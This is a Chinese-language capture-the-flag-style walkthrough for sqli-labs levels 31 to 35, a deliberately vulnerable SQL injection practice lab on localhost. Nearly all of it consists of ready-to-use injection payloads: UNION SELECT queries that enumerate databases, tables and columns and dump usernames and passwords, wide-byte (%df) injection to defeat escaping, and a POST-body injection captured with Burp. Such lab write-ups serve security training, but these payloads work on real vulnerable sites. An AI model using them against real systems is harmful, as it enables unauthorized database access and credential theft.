主页有sqli-labs靶场通关攻略 1-30
第三一关 less-31
闭合方式为?id=1&id=1 ") --+
步骤一:查看数据库名
http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%201,database(),3%20--+
步骤二:查看表名
http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+
步骤三:查看users表中列名
http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+
步骤四:查看信息
http://127.0.0.1/less-31/?id=1&id=-1%22)union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+
第三二关 less-32
宽字节注入%df
步骤一:查询闭合方式 ?id=1%df' --+
http://127.0.0.1/less-32/?id=1%df%27%20--+
步骤二:查看数据库名
http://127.0.0.1/less-32/?id=-1%df%27%20union%20select%201,database(),3%20--+
步骤三:查看表名
http://127.0.0.1/less-32/?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+
步骤四:查看users表中列名
http://127.0.0.1/less-32/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273%20--+
步骤五:查看信息
http://127.0.0.1/less-32/?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+
第三三关 less-33
步骤一:查询闭合方式 ?id=1%df' --+
http://127.0.0.1/less-33/?id=1%df%27%20--+
步骤二:查看数据库名
http://127.0.0.1/less-33/?id=-1%df%27%20union%20select%201,database(),3%20--+
步骤三:查看表名
http://127.0.0.1/less-33/?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+
步骤四:查看users表中列名
http://127.0.0.1/less-33/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273%20--+
步骤五:查看信息
http://127.0.0.1/less-33/?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+
第三四关 less-34
步骤一:输入Username:admin Password:admin 利用Burp抓包
步骤二:查看数据库名
uname=-1%df'union select 1,database()#
步骤三:查看表名
uname=-1%df%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()#
步骤四:查询users表中列名
uname=-1%df'union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#
步骤五:查看users表中信息
uname=-1%df'union select 1,group_concat(id,username,password) from users #
第三五关 less-35
步骤一:查询数据库
?id=-1 union select 1,2,database()--+
步骤二:查看表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
步骤三:查询users表中列名
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273--+
步骤四:查看信息
?id=-1 union select 1,group_concat(password,username),3 from users--+